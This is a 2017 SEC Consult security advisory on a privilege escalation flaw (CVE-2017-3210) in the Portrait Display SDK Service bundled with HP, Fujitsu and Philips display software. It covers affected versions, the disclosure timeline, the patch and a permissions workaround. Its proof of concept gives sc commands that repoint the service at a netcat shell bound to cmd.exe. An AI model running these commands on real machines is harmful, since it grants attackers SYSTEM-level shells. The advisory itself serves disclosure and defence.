Portrait Display SDK Service Privilege Escalation
Posted on 26 April 2017
SEC Consult Vulnerability Lab Security Advisory < 20170425-0 > ======================================================================= title: Privilege Escalation due to insecure service configuration product: Portrait Display SDK Service vulnerable version: mutliple, see PoC fixed version: multiple, see solution CVE number: CVE-2017-3210 impact: critical homepage: http://www.portrait.com/ found: 2017-02-23 by: W. Schober (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "For nearly 20 years, Portrait Displays has provided customized software to OEM monitor manufacturers across the globe. We develop tailored solutions, encompassing the needs of todayas changing marketplace. Our technologies allow OEMs to provide their end users with a premium interactive experience. Our engineers work hand-in-hand with leading OEMS, ODMs, and GPU and scaler companies, to develop and implement cutting-edge software solutions." Source: http://www.portrait.com/technology.html Business recommendation: ------------------------ SEC Consult recommends not to use this service in a production environment until a thorough security review has been performed by security professionals and all identified issues have been resolved. Vulnerability overview/description: ----------------------------------- The Portrait Display SDK Service (PdiService.exe) configuration was found to be writable for every authenticated user in a default installation. This would allow an attacker to execute arbitrary code, elevate his privileges and gain a shell with the privileges of the SYSTEM user. The Portrait Display SDK Service is used in various different OEM software, which is shipped per default on a wide range of notebooks. The software, where the SDK is included is used as an virtual OSD (On Screen Display) for "tuning" displays, setting gamma values, changing color values etc. The vulnerability was identified in the software "DisplayView Click" from Fujitsu. Due to the fact, that this SDK is used in several software packages, SEC Consult tried to identify other potential vulnerable software packages, which got rebranded by Portrait Displays, Inc. The following list contains an excerpt of packages containing the SDK, which are partially installed per default on notebooks of HP, Philips,Fujitsu, etc. -) Fujitsu DisplayView Click v5 -) Fujitsu DisplayView Click v6 -) HP Display Assistant -) HP Display Control -) HP Mobile Display Assistant v1 -) HP Mobile Display Assistant v2 -) HP My Display -) HP My Display All-In-One/TouchSmart -) HP Picture in Picture -) Philips SmartControl II -) Philips SmartControl Lite -) Philips SmartControl Premium Portait Displays Inc. confirmed that at least the following packages are vulnerable: Fujitsu DisplayView Click Version 6.0 build id: dtune-fts-R2014-04-22-1630-07, 6.01 build id: dtune-fts-R2014-05-13-1436-35 The issue was fixed in Version 6.3 build id: dtune-fts-R2016-03-07-1133-51 Fujitsu DisplayView Click Suite Version 5 build id: dtune-fus-R2012-09-26-1056-32 The issue is addressed by patch in Version 5.9 build id: dtune-fus-R2017-04-01-1212-32 HP Display Assistant Version 2.1 build id: dtune-hwp-R2012-10-31-1329-38 The issue was fixed in Version 2.11 build id: dtune-hwp-R2013-10-11-1504-22 and above HP My Display Version 2.01 build id: dtune-hpc-R2013-01-10-1507-17 The issue was fixed in Version 2.1 build id: dtune-hpc-R2014-06-27-1655-15 and above Philips Smart Control Premium Versions with issue: 2.23 build id: dtune-plp-R2013-08-12-1215-13, 2.25 build id: dtune-plp-R2014-08-29-1016-05 The issue was fixed in Version 2.26 build id: dtune-plp-R2014-11-14-1813-07 Furthermore, a more detailed summary of this advisory has been published at our blog: http://blog.sec-consult.com/2017/04/what-unites-hp-philips-and-fujitsu-one.html Proof of concept: ----------------- To identify the permissions of the service the builtin Windows command "sc" was used. The output of the command for the vulnerable service can be seen below: (A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU) (A;;CCLCSWRPWPDTLOCRRC;;;SY) (A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA) (A;;CCLCSWLOCRRC;;;IU) (A;;CCLCSWLOCRRC;;;SU) By "converting" the Security Descriptor Definition Language into human readable words, SEC Consult was able to identify the following permissions for the PdiService: RW NT AUTHORITYAuthenticated Users RW NT AUTHORITYSYSTEM RW BUILTINAdministrators R NT AUTHORITYINTERACTIVE R NT AUTHORITYSERVICE Due to the fact, that every authenticated user has write access on the service, an attacker is able to execute arbitrary code by changing the services binary path. Moreover, all Windows services are executed with SYSTEM permissions, resulting in privilege escalation. The workflow to execute arbitrary code is as follows: 1) Stop Service sc stop pdiservice 2) Alter service binary path sc config pdiservice binpath= "C: c.exe -nv 127.0.0.1 4242 -e C:WINDOWSSystem32cmd.exe" 3) Start Service sc start pdiservice Vulnerable / tested versions: ----------------------------- The following list contains all vulnerable versions: Fujitsu DisplayView Click Version 6.0 build id: dtune-fts-R2014-04-22-1630-07, 6.01 build id: dtune-fts-R2014-05-13-1436-35 The issue was fixed in Version 6.3 build id: dtune-fts-R2016-03-07-1133-51 Fujitsu DisplayView Click Suite Version 5 build id: dtune-fus-R2012-09-26-1056-32 The issue is addressed by patch in Version 5.9 build id: dtune-fus-R2017-04-01-1212-32 HP Display Assistant Version 2.1 build id: dtune-hwp-R2012-10-31-1329-38 The issue was fixed in Version 2.11 build id: dtune-hwp-R2013-10-11-1504-22 and above HP My Display Version 2.01 build id: dtune-hpc-R2013-01-10-1507-17 The issue was fixed in Version 2.1 build id: dtune-hpc-R2014-06-27-1655-15 and above Philips Smart Control Premium Versions with issue: 2.23 build id: dtune-plp-R2013-08-12-1215-13, 2.25 build id: dtune-plp-R2014-08-29-1016-05 The issue was fixed in Version 2.26 build id: dtune-plp-R2014-11-14-1813-07 Vendor contact timeline: ------------------------ 2017-03-01: Contacting vendor through email sales@portrait.com 2017-03-01: Informing CERT/CC, asking for coordination support regarding HW vendors, assigned VU#219739 2017-03-01: The vendor responds and requests all attachments as plaintext in the email body because they are not allowed to open any attachements from "unknown parties". Therefore SEC Consult sends the PGP Public Keys as plaintext in the body of the email. 2017-03-08: Contacting vendor again on how to transmit the advisory; no answer 2017-03-15: Informing CERT/CC about the status, asking for support to contact the vendor 2017-03-16: The Vendor provides a public key for encrypted communication; The advisory got securely transmitted to the vendor. 2017-03-18: The vendor responds and confirms that they were able to reproduce the vulnerability. Detailed information, on which Brands are affected, as well as a timeline for an update will be provided next week. 2017-03-28: Requesting update from Portrait Displays Inc. Asking about current state and a list of affected vendors. 2017-03-29: Vendors responds that they are still in the process of evaluating on, which 3rd parties are affected. 2017-04-06: Vendor updates us with information about the planed release schedule and affected vendors. Portrait is still in the progress of evaluating on, which3rd parties are affected. The list should be available at the end of the week. A patch that removes the invalid permission will be available on the vendors website. 2017-04-17: Vendor provides us with a detailed list of affected products. 2017-04-18: Vendor publicly releases a patch for the vulnerability on their website (http://www.portrait.com/securityupdate.html) 2017-04-21: SEC Consult requests a CVE from CERT/CC and coordinates the disclosure of the CERT VU and the SEC Consult advisory. 2017-04-25: Public release. Solution: --------- Since the 18th of April 2017 a patch is available. See: http://www.portrait.com/securityupdate.html Workaround: ----------- To quickly get rid of the vulnerability, the permissions of the service should be altered with the built-in windows command "sc". To completely remove the permissions of the "Authenticated Users" group, the following command can be used: sc sdset pdiservice D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA) (A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU) This will result in the following set of permissions: RW NT AUTHORITYSYSTEM RW BUILTINAdministrators R NT AUTHORITYINTERACTIVE R NT AUTHORITYSERVICE Advisory URL: ------------- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/Career.htm Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/About/Contact.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF W. Schober / @2017